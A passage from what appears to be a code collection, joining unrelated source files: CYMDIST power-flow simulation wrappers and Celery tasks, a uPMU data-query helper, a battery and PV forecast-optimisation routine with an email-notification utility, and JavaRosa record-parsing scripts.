voltages = _input_voltages(input_voltage_names, input_voltage_values)
if input_save_to_file in [1, 1.0, '1']:
input_save_to_file = True
else:
input_save_to_file = False
model = _read_configuration_file(configuration_filename, time)
# Open the model
cympy.study.Open(model['filename'])
# Set voltages
networks = cympy.study.ListNetworks()
_set_voltages(voltages, networks)
# Set loads
if model['set_loads']:
_set_loads(model['set_loads'])
# Add loads
if model['new_loads']:
_add_loads(model['new_loads'])
    # Set PVs
if model['set_pvs']:
_set_pvs(model['set_pvs'])
# Add PV
if model['new_pvs']:
_add_pvs(model['new_pvs'])
# Run the power flow
lf = cympy.sim.LoadFlow()
lf.Run()
# Return the right values
source_node_id = cympy.study.GetValueTopo("Sources[0].SourceNodeID", networks[0])
output = _output_values(source_node_id, output_names)
# Write results?
if model['save'] not in 'False':
_write_results(source_node_id, model['save'])
return output
```
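A minimal configuration sketch matching the `config.json` layout described in the docstring above; all ids and values are placeholders. Note that the wrapper code also reads a `save` key from each model entry even though the docstring does not list it.
```python
import json

config = {
    "times": [0],
    "interpolation_method": "closest_time",
    "models": [{
        "filename": "my_model.sxst",        # hypothetical model file
        "save": "False",
        "new_loads": [], "new_pvs": [], "set_pvs": [],
        "set_loads": [{
            "device_number": "LOAD_1",      # placeholder device id
            "active_power": [{"active_power": 12.5, "phase_index": "0", "phase": "A"}],
        }],
    }],
}
with open("config.json", "w") as f:
    json.dump(config, f, indent=2)
```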
#### File: worker/sim_worker/tasks.py
```python
from .celery import app
import os
import json
import shutil
import datetime
import random
import math
import pandas
import dateutil.parser
import re
def drop_column(table, column):
for row in table:
del row[column]
@app.task
def get_model(modelname):
# Import cympy from the function to prevent multiple import caused by celery importing this module at launch
from . import cymdist
cymdist.open_study(modelname + '.sxst')
cymdist.compute_loadflow()
model = cymdist.model_info(modelname)
devices = cymdist.list_devices()
cymdist.get_devices_details(devices)
nodes = cymdist.list_nodes()
cymdist.get_voltages(nodes)
sections = cymdist.list_sections()
# Remove cympy objects to be able to serialize
drop_column(devices, 'device_object')
drop_column(nodes, 'node_object')
drop_column(sections, 'section_object')
# Return result and exit the worker to "free" cympy
app.backend.mark_as_done(get_model.request.id, (model, nodes,sections,devices))
exit(0)
@app.task
def run_configuration(id, project):
    # run_configuration uses the solar.csv sunlight data as well as the SCADA baseload data through the solarprofile.py and scadaprofile.py modules
    # run_configuration returns the estimated PV production in time and the estimated load in time
import sim_worker.pv
# import sim_worker.substation
import sim_worker.scada
import sim_worker.scadaprofile as scp
import sim_worker.solarprofile as sop
simDays = project['simulation_dates']
l=[]
for key in simDays:
l.append(min(simDays[key].items(), key=lambda x: x[1]))
day=min(l,key=lambda x: x[1])[0]
start=day + ' 07:00:00'
end=day + ' 18:00:00'
substation = project['model']
add_pv = pandas.DataFrame.from_dict(project['addPv'])
if (add_pv.empty):
pv=[]
pvIndex=[]
else :
pv_nominal_capacity_kw = add_pv['power'].sum()
pv = sop.solar_profile(start, end, pv_nominal_capacity_kw)
pvIndex=pv.index.strftime('%Y-%m-%d %H:%M:%S').tolist()
pv = pv.iloc[:,0].tolist()
load = scp.scada_profile(start, end, substation)
loadIndex = load.to_frame().index.strftime('%Y-%m-%d %H:%M:%S').tolist()
load=load.tolist()
ev = []
return { 'pv': pv, 'pvIndex': pvIndex, 'ev': ev, 'load': load, 'loadIndex': loadIndex, 'date': day }
@app.task
def run_detailed_configuration(id, project):
    # run_detailed_configuration uses the solar.csv sunlight data as well as the SCADA baseload data through the solarprofile.py and scadaprofile.py modules
    # run_detailed_configuration returns the estimated PV production and the estimated load in time for each candidate simulation day
import sim_worker.pv
# import sim_worker.substation
import sim_worker.scada
import sim_worker.scadaprofile as scp
import sim_worker.solarprofile as sop
simDays = project['simulation_dates']
x=pandas.Series()
for key in simDays:
x=x.append(pandas.Series(list(simDays[key].keys())))
x=x.drop_duplicates().sort_values()
result={}
for day in x:
start=day + ' 07:00:00'
end=day + ' 18:00:00'
substation = project['model']
add_pv = pandas.DataFrame.from_dict(project['addPv'])
if (add_pv.empty):
pv=[]
pvIndex=[]
else :
pv_nominal_capacity_kw = add_pv['power'].sum()
pv = sop.solar_profile(start, end, pv_nominal_capacity_kw)
pvIndex=pv.index.strftime('%Y-%m-%d %H:%M:%S').tolist()
pv = pv.iloc[:,0].tolist()
load = scp.scada_profile(start, end, substation)
loadIndex = load.to_frame().index.strftime('%Y-%m-%d %H:%M:%S').tolist()
load=load.tolist()
ev = []
temp={}
temp['pv']=pv
temp['pvIndex']=pvIndex
temp['ev']=ev
temp['load']=load
temp['loadIndex']=loadIndex
temp['date']=day
result[day]=temp
return result
@app.task
def run_simulation(id, project, day):
# run_simulation prepares and formats the data from the project settings and launches the simulation through the cymdist python api
# run_simulation returns in json format the simulation results that will be saved in the results field of the project
from . import cymdist
from sim_worker.pv import PVFactory
from sim_worker.substation import Substation
from sim_worker.scada import Scada
pv_node_ids = []
pv_network_ids = []
pv_device_ids = []
pv_nominal_capacities = []
load_node_ids = []
load_network_ids = []
load_device_ids = []
load_nominal_capacities = []
substation = Substation('C:/Users/DRRC/Desktop/PGE_Models_DO_NOT_SHARE/' + project['model'] + '.sxst')
i=0
for p in project['addPv']:
pv_node_ids.append(p['node_id'])
pv_network_ids.append(p['feeder'])
pv_nominal_capacities.append(-1*p['power'])
pv_device_ids.append('PV' + str(i) )
i=i+1
# assuming load_nominal capacities is equivalent to the opposite of pv_nominal_capacities
i=0
for p in project['addLoad']:
load_node_ids.append(p['node_id'])
load_network_ids.append(p['feeder'])
load_nominal_capacities.append(p['power'])
load_device_ids.append('Load' + str(i) )
i=i+1
substation.add_power_devices(node_ids=pv_node_ids, network_ids=pv_network_ids, device_ids=pv_device_ids)
pvfactory = PVFactory('sim_worker/solar.csv')
pvs = pvfactory.create(pv_nominal_capacities, pv_device_ids)
scada = Scada('C:/Users/DRRC/Desktop/raw_SCADA/' + project['model'] + '.csv')
# simDays = project['simulation_dates']
# l=[]
# for key in simDays:
# l.append(min(simDays[key].items(), key=lambda x: x[1]))
# day=min(l,key=lambda x: x[1])[0]
start=day + ' 07:00:00'
end=day + ' 18:00:00'
timestep = '60T'
datetimes = pandas.date_range(start, end, freq= timestep).tolist()
results = []
for t in datetimes:
print("Run substation at " + t.strftime("%Y-%m-%d %H:%M:%S"))
feeder_baseloads = scada.get(t)
substation.baseload_allocation(feeder_loads=feeder_baseloads)
substation.set_power_devices(device_ids=[pv.id for pv in pvs],
values=[pv.get(t) for pv in pvs])
substation.run_powerflow(feeders=feeder_baseloads.keys())
nodes = substation.list_nodes()
nodes = substation.get_voltage(nodes)
results.append(nodes)
dfs = []
indexes = []
i=0
for result in results:
keys=[]
values=[]
df=result
columnNumbers = [x for x in range(df.shape[1])]
columnNumbers.remove(0)
df=df.iloc[:,columnNumbers]
df=df.set_index('node_id')
df = df.where((pandas.notnull(df)), None)
df['max']=df[['voltage_A','voltage_B','voltage_C']].max(axis=1)
df['min']=df[['voltage_A','voltage_B','voltage_C']].min(axis=1)
worstHighVoltage=df.loc[df['max'].idxmax()]
worstLowVoltage=df.loc[df['min'].idxmin()]
df=df.drop('min', axis=1)
df=df.drop('max', axis=1)
keys=df.index.tolist()
for index, row in df.iterrows():
values.append(row.to_dict())
df=dict(zip(keys, values))
df['worstHighVoltage']=worstHighVoltage.to_dict()
df['worstLowVoltage']=worstLowVoltage.to_dict()
dfs.append(df)
indexes.append(datetimes[i].strftime("%Y_%m_%d_%H_%M_%S"))
i=i+1
d = dict(zip(indexes, dfs))
r={}
r['results']=d
r['date']=day
return r
```
#### File: hil/sensors/uPMU_wrapper.py
```python
from requests import get
from json import loads
def get_latest(uuid, server, fmu=True):
#uuid from database
    #server including port: http://[server]:[port] (standard BTrDB port is 9000)
    #fmu option: print only the value for the FMU, or timestamp and value if False
r = get("{}/q/nearest/{}?time={}&backwards=true".format(server, uuid, 2524608000*10**9))
if r.status_code == 200:
if fmu:
return loads(r.text.encode('ascii','ignore'))[1]
else:
return loads(r.text.encode('ascii','ignore'))
else:
return -1
def get_range(uuid, t_start, t_end, server, fmu=True):
#uuid from database
#t_start as start time of range in nano-seconds (unix time)
#t_end as end time of range in nano-seconds (unix time)
    #server including port: http://[server]:[port] (standard BTrDB port is 9000)
    #fmu option: print only the value for the FMU, or timestamp and value if False
r = get("{}/data/uuid/{}?starttime={}&endtime={}&unitoftime=ns".format(server, uuid, t_start, t_end))
if r.status_code == 200:
if fmu:
return [val for ts, val in loads(r.text.encode('ascii','ignore'))[0]['Readings']]
else:
return loads(r.text.encode('ascii','ignore'))[0]['Readings']
else:
return -1
if __name__ == "__main__":
#Example code
server = "http://yourhost:yourport"
uuid = "youruuid"
print 'Test of uPMU queries for {}\nat {}'.format(uuid, server)
print 'Latest value as FMU:', get_latest(uuid, server)
    temp = get_latest(uuid, server, False)
print 'Latest value:', temp
print 'Latest readings of the last 1 second (120 with uPMU):', len(get_range(uuid, temp[0]-1*10**9, temp[0], server))
def exchange(configuration_file, time, input_names,
input_values, output_names, write_results):
"""
Return a list of output values from the Python-based Simulator.
The order of the output values must match the order of the output names.
:param configuration_file (String): Path to the Simulator model or configuration file
:param time (Float): Simulation time
:param input_names (Strings): Input names
:param input_values (Floats): Input values (same length as input_names)
:param output_names (Strings): Output names
:param write_results (Float): Store results to file (1 to store, 0 else)
Example:
>>> configuration_file = 'config.json'
>>> time = 0
>>> input_names = 'v'
>>> input_values = 220.0
>>> output_names = 'i'
>>> write_results = 0
>>> output_values = simulator(configuration_file, time, input_names,
input_values, output_names, write_results)
"""
    # The assumption is that the server name and the uuid
    # are concatenated and separated by a ";" in output_names.
    # This allows splitting each output name and extracting that information.
if (isinstance(output_names, list)):
output_values=[]
for var in output_names:
var = var.split(";")
if(len(var)<2):
s="The output name={!s} was incorrectly defined. The syntax must be server:uuid".format(var)
raise ValueError(s)
# Get the server name
server=var[0]
# Get the uuid which identifies the output
# to be retrieved
uuid=var[1]
output_values.append(1.0 * float(get_latest(uuid, server, False)[1]))
#output_values = 1.0 * float(output_values[1])
return output_values
``` |
{
"source": "Jonathan56/pylec_forecastpaper",
"score": 3
} |
#### File: pylec_forecastpaper/fppylec/main.py
```python
import pandas
from datetime import datetime, timedelta
from fppylec import metric, forecast, optimization, validate
def main(df, start, end, pv_capacity, battery_kWh, battery_kW,
f_method, f_kwarg, f_horizon, f_train_period, control_func):
"""
Core function to run forecast -> optimization.
Notes:
f_horizon=timedelta(days=2) - timedelta(minutes=15)
f_train_period=timedelta(days=14)
"""
# Result frame (add training data or "real data")
start_timer = datetime.now()
one_day = timedelta(hours=23, minutes=45)
result = df.loc[start-f_train_period:start-timedelta(minutes=15)].copy()
result['r_houses_kW'] = result['vo_houses_kW']
result['r_pv_kW'] = result['vo_pv_coef'] * pv_capacity
result['r_battery_kW'] = [0] * len(result)
# Main loop optimize once a day
days = (df.loc[start:end].groupby(pandas.Grouper(freq='D')).sum().index)
SOC_end = [battery_kWh / 2]
for day in days:
# Retrieve historical data, and prepare future results
training = result.loc[day-f_train_period:day].copy()
dfalgo = df.loc[day:day+f_horizon].copy()
# DFALGO
# Forecasts (PV and consumption)
dfalgo['f_pv_kW'] = dfalgo['vo_pv_coef'] * pv_capacity
if f_method == forecast.perfect:
dfalgo['f_houses_kW'] = dfalgo['vo_houses_kW']
else:
dfalgo['f_houses_kW'] = f_method(
training['r_houses_kW'], f_horizon, **f_kwarg)
# Control signal
dfalgo['f_battery_kW'], SOC = control_func(
dfalgo['f_houses_kW'], dfalgo['f_pv_kW'],
extra={'battery_kWh': battery_kWh,
'battery_kW': battery_kW,
'initial_kwh': SOC_end, 'eta': 0.95})
emin, emax = validate.battery(
dfalgo, (0, battery_kWh), (-battery_kW, battery_kW), SOC_end[0])
SOC_end = SOC['SOC_end']
# DFDAY
# Select results for only one day
dfday = df.loc[day:day+one_day].copy()
dfday['f_houses_kW'] = dfalgo.loc[day:day+one_day, 'f_houses_kW'].copy()
dfday['f_pv_kW'] = dfalgo.loc[day:day+one_day, 'f_pv_kW'].copy()
dfday['f_battery_kW'] = dfalgo.loc[day:day+one_day, 'f_battery_kW'].copy()
# Insert some impact of the coordination in the overall metered consump.
dfday['r_battery_kW'] = dfday['f_battery_kW'] # Perfect forecast
dfday['r_houses_kW'] = dfday['vo_houses_kW'] # Real = historic values
dfday['r_pv_kW'] = dfday['f_pv_kW'] # Perfect forecast
# Save for the next iteration
result = pandas.concat([result, dfday], axis=0, sort=True)
# Remove training from the results ?
result = result.loc[
start:end, ['vo_houses_kW', 'vo_pv_coef',
'f_houses_kW', 'f_pv_kW', 'f_battery_kW',
'r_houses_kW', 'r_pv_kW', 'r_battery_kW']]
time_elapsed = datetime.now() - start_timer
print('Time elapsed (hh:mm:ss.ms) {}'.format(time_elapsed))
print('')
# Quality
metrics = {}
metrics['MAPE_%'] = metric.mape(
result, 'vo_houses_kW', 'f_houses_kW', threshold=0.1)
metrics['MAPE_9a8p_%'] = metric.mape_hod(
result, 'vo_houses_kW', 'f_houses_kW', threshold=0.1,
start='9:00', end='20:00')
metrics['MAE_kW'] = metric.mae(result, 'vo_houses_kW', 'f_houses_kW')
metrics['MASE'] = metric.mase(result, 'vo_houses_kW', 'f_houses_kW')
metrics['ME_kW'] = metric.me(result, 'vo_houses_kW', 'f_houses_kW')
# Value
r = metric.value_metrics(result, 'r_houses_kW', 'r_pv_kW', 'r_battery_kW')
metrics['scons_%'] = r['scons_%']
metrics['ssuff_%'] = r['ssuff_%']
metrics['scons_%_nobatt'] = r['scons_%_nobatt']
metrics['ssuff_%_nobatt'] = r['ssuff_%_nobatt']
return metrics
```
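The metric names above (a thresholded MAPE, MAE, MASE) are computed in `fppylec.metric`, which is not shown here; the following is only a plausible sketch of a thresholded MAPE, not the package's actual implementation.
```python
import numpy as np

def mape_sketch(actual, forecast, threshold=0.1):
    """Mean absolute percentage error, ignoring near-zero actual values."""
    actual = np.asarray(actual, dtype=float)
    forecast = np.asarray(forecast, dtype=float)
    mask = np.abs(actual) > threshold            # drop points below the threshold
    return 100 * np.mean(np.abs((actual[mask] - forecast[mask]) / actual[mask]))

print(round(mape_sketch([1.0, 2.0, 0.05], [1.1, 1.8, 0.2]), 1))  # -> 10.0
```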
#### File: pylec_forecastpaper/fppylec/util.py
```python
import smtplib
from email.message import EmailMessage
import io
import pandas
def send_email(subject, body, df=False, html=False,
_from='<EMAIL>',
_pwd='<PASSWORD>'):
"""
Convenient function to get automatic updates on simulations
"""
message = EmailMessage()
message['From'] = _from
message['To'] = _from
message['Subject'] = subject
message.set_content(body)
if isinstance(df, pandas.DataFrame):
message.add_attachment(_export_csv(df), filename='result.csv')
if html:
with open(html, 'r') as f:
message.add_attachment(f.read(), filename=html)
# Send
mail_server = smtplib.SMTP_SSL('smtp.gmail.com')
mail_server.login(_from, _pwd)
mail_server.send_message(message)
mail_server.quit()
return True
def _export_csv(df):
with io.StringIO() as buffer:
df.to_csv(buffer)
return buffer.getvalue()
``` |
{
"source": "Jonathan727/javarosa",
"score": 3
} |
#### File: util/scripts/devicelogs.py
```python
from rmsdump import *
def read_log_entry (log_entry):
return tuple(log_entry.val[i].val for i in range(0, 3))
def print_log (log_atom):
print '%s> %s: %s' % (log_atom[0].strftime('%Y-%m-%d %H:%M:%S'), log_atom[1], log_atom[2])
if __name__ == "__main__":
data = sys.stdin.read()
stream = DataStream(data)
(rmses, num_rms, err) = extract_rms(stream)
log_rmses = [rms for rms in rmses if rms['name'].startswith('LOG_') and rms['name'] not in ('LOG_IX', 'LOG_PANIC')]
log_entries = []
for log_rms in log_rmses:
log_entries.extend([rec['content'][1] for rec in log_rms['records']])
panic_rms = [rms for rms in rmses if rms['name'] == 'LOG_PANIC']
if len(panic_rms) > 0 and len(panic_rms[0]['records']) > 0:
print 'PANIC entries detected!'
log_digest = [read_log_entry(le) for le in log_entries]
for la in sorted(log_digest, key=lambda la: la[0]):
print_log(la)
```
#### File: util/scripts/recparse.py
```python
import struct
from datetime import datetime
#TODO: if there is an error when deserializing the record, would be VERY nice to return the partial
#deserialization of the record up to that point
class Datum:
def __init__ (self, type, val):
self.type = type
self.val = val
def __repr__ (self):
return self.pretty_print(suppress_start_indent=True, suppress_end_newline=True)
def pretty_print (self, indent=0, suppress_start_indent=False, suppress_end_newline=False):
return self._pretty_print(indent, suppress_start_indent) + ('\n' if not suppress_end_newline else '')
def _pretty_print (self, indent, suppress_start_indent=False):
buf = ''
IND = ' ' * indent
if not suppress_start_indent:
buf += IND
if self.type in ('int', 'dbl', 'bool', 'str', 'date', 'bytes', 'generic', 'error'):
prefix = {'int': 'i', 'dbl': 'f', 'bool': 'b', 'str': 's', 'date': 'd', 'bytes': 'x', 'generic': '?', 'error': '!'}[self.type]
if self.val != None:
if self.type == 'int':
sval = '%d' % self.val
elif self.type == 'dbl':
sval = '%f' % self.val
elif self.type == 'bool':
sval = ('true' if self.val else 'false')
elif self.type == 'str' or self.type == 'bytes':
sval = repr(self.val)
elif self.type == 'date':
sval = self.val.strftime('%Y-%m-%d %H:%M:%S')
elif self.type == 'error':
sval = '#%d [%s]' % (len(self.val), tohex(self.val))
else:
sval = '<null>'
buf += '%s %s' % (prefix, sval)
elif self.type in ('seq', 'list', 'map') or self.type.startswith('obj:'):
_print_element = lambda e: e._pretty_print(indent + 1)
_print_mapping = lambda (k, v): k._pretty_print(indent + 1) + ' => ' + v._pretty_print(indent + 1, True)
def _iteritems_sorted (map):
for k in sorted(map.keys(), key=lambda datum: datum.val):
yield (k, map[k])
if self.type == 'seq':
config = (True, '()', lambda x: x, _print_element)
elif self.type.startswith('obj:'):
config = (False, '()', lambda x: x, _print_element)
elif self.type == 'list':
config = (True, '[]', lambda x: x, _print_element)
elif self.type == 'map':
config = (True, '{}', _iteritems_sorted, _print_mapping)
(show_count, brackets, iterator, print_elem) = config
buf += self.type + ' '
if self.val != None:
if show_count:
buf += '#%d ' % len(self.val)
buf += brackets[0]
if len(self.val) > 0:
buf += '\n'
for (i, e) in enumerate(iterator(self.val)):
buf += print_elem(e)
if i < len(self.val) - 1:
buf += ','
buf += '\n'
buf += IND
else:
buf += ' '
buf += brackets[1]
else:
buf += '<null>'
return buf
class Type:
def __init__ (self, base, params):
if base.startswith('obj:'):
self.custom = True
self.base = base[4:]
if self.base == '':
raise ValueError('custom object type not specified')
else:
self.custom = False
self.base = base
self.params = params
self.validate()
def basename (self):
return ('obj:' if self.custom else '') + self.base
def validate (self):
allowed = {
'int': 0, 'bool': 0, 'dbl': 0, 'str': 0, 'date': 0, 'bytes': 0,
'obj': 0, 'seq': None, 'null': 1, 'tagged': 0, 'list': 1, 'listp': 0, 'map': 2, 'mapp': 1
}
name = self.base if not self.custom else 'obj'
if name in allowed:
num_args = allowed[name]
if num_args != None and len(self.params) != num_args:
raise ValueError('wrong number of args for [%s]' % self.basename())
else:
raise ValueError('unrecognized type [%s]' % self.base)
def parse (self, stream):
return self.parse_func(stream)(*self.params)
def parse_func (self, stream):
builtin_types = {
'int': stream.read_int,
'bool': stream.read_bool,
'dbl': stream.read_float,
'str': stream.read_string,
'date': stream.read_date,
'bytes': stream.read_binary,
'null': stream.read_null,
'tagged': stream.read_tagged,
'list': stream.read_list,
'listp': stream.read_list_poly,
'map': stream.read_map,
'mapp': stream.read_map_poly,
'seq': lambda *subtypes: Datum('seq', tuple([type.parse(stream) for type in subtypes]))
}
if not self.custom:
return builtin_types[self.base]
else:
if self.base in custom_types:
parse_obj_func = custom_types[self.base]
return lambda: Datum(self.basename(), parse_obj_func(stream))
else:
                raise ValueError('unknown object type [%s]' % self.base) #TODO: propagate partial deserialization
def null_datum (self):
if self.base in ['null', 'tagged']:
basetype = 'generic'
elif self.base == 'listp':
basetype = 'list'
elif self.base == 'mapp':
basetype = 'map'
else:
basetype = self.base
return Datum(basetype, None)
def unwrap (self):
if self.base != 'seq' or len(self.params) != 1:
raise ValueError('not a single-item sequence')
return self.params[0]
class Stream:
def __init__ (self, bytes):
self.stream = self.stream_gen(bytes)
self.buffers = []
def stream_gen (self, bytes):
for b in bytes:
yield b
def read (self):
try:
b = self.stream.next()
for buffer in self.buffers:
buffer.append(b)
return b
except StopIteration:
raise self.EndOfStream([''.join(buff) for buff in reversed(self.buffers)])
def mark (self):
self.buffers.append([])
def iter (self):
try:
while True:
yield self.read()
except self.EndOfStream:
            return
class EndOfStream (Exception):
bytes = 'not implemented'
def __init__ (self, buffers):
self.buffers = buffers
def __str__ (self):
return 'unexpected end of stream'
class DataStream (Stream):
def __init__ (self, bytes):
Stream.__init__(self, bytes)
def read (self, n=1):
return ''.join([Stream.read(self) for i in range(0, n)])
def read_int (self, require_pos=False):
(buff, c) = ([], None)
while c == None or ord(c) >= 128:
c = self.read()
buff.append(ord(c) % 128)
if buff[0] >= 64:
buff[0] -= 128
val = reduce(lambda x, y: 128 * x + y, buff)
if require_pos and val < 0:
            raise ValueError('negative integer') #TODO: propagate partial deserialization
elif len(buff) > 1:
k = len(buff) - 1
vmin = -(128**k / 2)
vmax = 128**k / 2 - 1
if val <= vmax and val >= vmin:
                raise ValueError('overlong integer encoding') #TODO: propagate partial deserialization
return Datum('int', val)
def read_string (self):
n = reduce(lambda x, y: 256 * x + y, [ord(b) for b in self.read(2)])
val = self.read(n)
try:
unicode(val, 'utf-8')
except UnicodeDecodeError:
            raise #TODO: propagate partial deserialization
return Datum('str', val)
def read_bool (self):
b = ord(self.read())
if b != 0 and b != 1:
            raise ValueError('boolean not 0x00 or 0x01') #TODO: propagate partial deserialization
return Datum('bool', b == 1)
def read_float (self):
return Datum('dbl', struct.unpack('!d', self.read(8))[0])
def read_date (self):
try:
return Datum('date', datetime.utcfromtimestamp(self.read_int().val / 1000.))
except ValueError: # out-of-range error
            raise ValueError('date ticks overflow') #TODO: propagate partial deserialization
def read_binary (self):
return Datum('bytes', self.read(self.read_int().val))
class CompoundDataStream (DataStream):
def __init__ (self, bytes):
DataStream.__init__(self, bytes)
def read_null (self, type):
if self.read_bool().val:
return type.parse(self)
else:
return type.null_datum()
def read_list (self, type):
return self._read_list(lambda: type.parse(self))
def _read_list (self, get_elem):
v = []
n = self.read_int().val
for i in range(0, n):
v.append(get_elem())
return Datum('list', v)
def read_map (self, keytype, elemtype):
return self._read_map(keytype, lambda: elemtype.parse(self))
def _read_map (self, keytype, get_elem):
m = {}
n = self.read_int().val
for i in range(0, n):
k = keytype.parse(self)
v = get_elem()
m[k] = v
return Datum('map', m)
def read_tagged (self):
return self.read_type().parse(self)
def read_type (self):
tag = self.read(4)
basetype = basetype_from_tag(tag)
if basetype == 'wrapper':
(basetype, params) = self.unwrap_type()
else:
params = []
return Type(basetype, params)
def unwrap_type (self):
subtype = self.read_int().val
if subtype == 0:
return ('null', [self.read_type()])
elif subtype == 32:
return ('list', [self.read_type()])
elif subtype == 33:
return ('listp', [])
elif subtype == 34:
self.read_bool() # 'ordered' flag
return ('map', [self.read_type(), self.read_type()])
elif subtype == 35:
self.read_bool() # 'ordered' flag
return ('mapp', [self.read_type()])
else:
            raise ValueError('unrecognized wrapper code [%d]' % subtype) #TODO: propagate partial deserialization
def read_list_poly (self):
return self._read_list(lambda: self.read_tagged())
def read_map_poly (self, keytype):
return self._read_map(keytype, lambda: self.read_tagged())
def read_compound (self, template):
return type_from_template(template).parse(self)
def read_template (self, template):
return type_list_from_template(template).parse(self)
def deserialize (bytes, template):
stream = CompoundDataStream(bytes)
obj = stream.read_compound(template)
#handle botched parsing here?
#handle extra data left over here?
#return (status, obj)
return obj
def type_from_template (template):
return type_list_from_template(template).unwrap()
def type_list_from_template (template):
return Type('seq', tuple([type_from_template_token(token) for token in tokenize(template, ',', '()')]))
def type_from_template_token (token):
if '(' in token and token[-1] != ')':
raise ValueError('extra crap after close paren')
if '(' in token:
name = token.split('(')[0]
args = list(type_list_from_template(token[token.find('(')+1:-1]).params)
else:
name = token
args = []
if len(name) == 0:
raise ValueError('empty token name')
return Type(name, args)
def tokenize (str, sep, brackets):
depth = 0
tok_start = 0
for i in range(0, len(str) + 1):
new_token = False
if i == len(str):
if depth == 0:
new_token = True
else:
raise ValueError('unbalanced brackets')
elif str[i] == sep and depth == 0:
new_token = True
elif str[i] == brackets[0]:
depth += 1
elif str[i] == brackets[1]:
depth -= 1
if depth < 0:
raise ValueError('unbalanced parens')
if new_token:
token = str[tok_start:i]
tok_start = i + 1
yield token
def parse_custom (template):
return lambda stream: stream.read_template(template).val
# relies on stream containing ONLY data for the record
def _parse_property (stream):
return (Datum('str', ''.join(list(stream.iter()))),)
def _parse_tree_child (stream):
if stream.read_bool().val:
val = stream.read_compound('obj:treeelem')
else:
val = stream.read_tagged() # if this happens, which it almost certainly won't, we almost certainly won't have the prototype registered
return (val,)
def _parse_xpath_num_lit (stream):
if stream.read_bool().val:
val = stream.read_float()
else:
val = stream.read_int()
return (val,)
def _parse_xpath_path (stream):
type = stream.read_int()
filtexpr = stream.read_compound('obj:xpath-expr-filt') if type.val == 2 else None
steps = stream.read_compound('list(obj:xpath-step)')
return (type, filtexpr, steps) if filtexpr != None else (type, steps)
def _parse_xpath_step (stream):
axis = stream.read_int()
test = stream.read_int()
if test.val == 0:
detail = stream.read_compound('obj:qname')
elif test.val == 2:
detail = stream.read_string()
elif test.val == 6:
detail = stream.read_compound('null(str)')
else:
detail = None
preds = stream.read_compound('listp')
return (axis, test, detail, preds) if detail != None else (axis, test, preds)
custom_types = {
'rmsinfo': parse_custom('int,int,int'),
'recloc': parse_custom('int,int'),
'user': parse_custom('str,str,int,str,bool,map(str,str)'),
'case': parse_custom('str,str,str,str,bool,null(date),int,mapp(str)'),
'patref': parse_custom('str,date,date,str,str,int,bool'),
'formdef': parse_custom('int,str,null(str),listp,obj:forminst,null(obj:loclzr),list(obj:condition),list(obj:recalc),listp'),
'qdef': parse_custom('int,null(str),null(str),null(str),null(str),null(str),null(str),null(str),int,list(obj:selchoice),null(tagged)'),
'selchoice': parse_custom('bool,str,str'),
'gdef': parse_custom('int,tagged,null(str),null(str),null(str),null(str),bool,listp,bool,null(tagged)'),
'loclzr': parse_custom('bool,bool,map(str,listp),list(str),null(str),null(str)'),
'resfiledatasrc': parse_custom('str'),
'localedatasrc': parse_custom('map(str,str)'),
'condition': parse_custom('tagged,obj:treeref,list(obj:treeref),int,int'),
'recalc': parse_custom('tagged,obj:treeref,list(obj:treeref)'),
'treeref': parse_custom('int,list(str),list(int)'),
'forminst': parse_custom('int,int,null(str),null(str),null(date),map(str,str),obj:treeelem'),
# 'forminst-compact': ..., oh boy...
'treeelem': parse_custom('str,int,bool,null(tagged),null(list(obj:treechildpoly)),int,bool,bool,bool,bool,bool,null(obj:constraint),str,str,list(str)'),
'treechildpoly': _parse_tree_child,
'intdata': parse_custom('int'),
'booldata': parse_custom('bool'),
'strdata': parse_custom('str'),
'selonedata': parse_custom('obj:sel'),
'selmultidata': parse_custom('list(obj:sel)'),
'sel': parse_custom('str,int'),
'floatdata': parse_custom('dbl'),
'datedata': parse_custom('date'),
'datetimedata': parse_custom('date'),
'timedata': parse_custom('date'),
'constraint': parse_custom('tagged,str'),
'xpathcond': parse_custom('tagged'),
'xpathref': parse_custom('str,obj:treeref'),
'xpath-expr-arith': parse_custom('int,tagged,tagged'),
'xpath-expr-bool': parse_custom('int,tagged,tagged'),
'xpath-expr-cmp': parse_custom('int,tagged,tagged'),
'xpath-expr-eq': parse_custom('bool,tagged,tagged'),
'xpath-expr-filt': parse_custom('tagged,listp'),
'xpath-expr-func': parse_custom('obj:qname,listp'),
'xpath-expr-numlit': _parse_xpath_num_lit,
'xpath-expr-numneg': parse_custom('tagged'),
'xpath-expr-path': _parse_xpath_path,
'xpath-expr-strlit': parse_custom('str'),
'xpath-expr-union': parse_custom('tagged,tagged'),
'xpath-expr-varref': parse_custom('obj:qname'),
'xpath-step': _parse_xpath_step,
'qname': parse_custom('null(str),str'),
'property': _parse_property,
'txmsg': parse_custom('tagged'),
'simplehttptxmsg': parse_custom('str,int,str,int,str,date,date,int,int,str,int,str,bytes'),
'logentry': parse_custom('date,str,str'),
'cc-recd-forms-mapping': parse_custom('list(int),map(int,int)')
}
def basetype_from_tag (tag):
type_tags = {
'\xff\xff\xff\xff': 'wrapper',
'\xe5\xe9\xb5\x92': 'generic', #object -- should never be encountered
'\x7c\xa1\x6f\xdb': 'int',
'\x8a\xc5\x87\x0b': 'int', #long
'\xb5\xdc\x2e\x41': 'int', #short
'\x03\x3e\xb3\x91': 'int', #byte
'\x58\x4b\x12\x84': 'char',
'\xe4\xf9\xf9\xae': 'bool',
'\xc9\x83\xee\x7b': 'dbl', #float
'\x8e\xa8\x96\x89': 'dbl',
'\x42\xc2\x5b\xe3': 'str',
'\xc5\x1d\xfd\xa6': 'date',
'\x27\x51\x2e\xc9': 'obj:qdef',
'\xb3\xc4\x9b\xbd': 'obj:gdef',
'\x68\xc2\xaf\xad': 'obj:intdata',
'\x8f\x4b\x45\xfe': 'obj:booldata',
'\xed\xce\xd1\xce': 'obj:geodata',
'\x02\x6f\x56\x15': 'obj:strdata',
'\x29\xd7\x1a\x40': 'obj:selonedata',
'\xf7\x30\xcc\x7d': 'obj:selmultidata',
'\x4e\x52\xe2\x15': 'obj:floatdata',
'\x51\x0e\x1e\x6e': 'obj:datedata',
'\x6f\x87\x88\xa7': 'obj:datetimedata',
'\x68\x4e\x4e\x2e': 'obj:timedata',
'\x2b\xf7\x1a\xcb': 'obj:ptrdata',
'\xec\xa8\xec\xde': 'obj:multiptrdata',
'\xef\x74\x56\x54': 'obj:basicdataptr',
'\xf3\x06\x34\x28': 'obj:xpath-expr-arith',
'\xf6\xe4\xb9\xaf': 'obj:xpath-expr-bool',
'\x91\x2e\xfc\xee': 'obj:xpath-expr-cmp',
'\x65\x71\x6e\x97': 'obj:xpath-expr-eq',
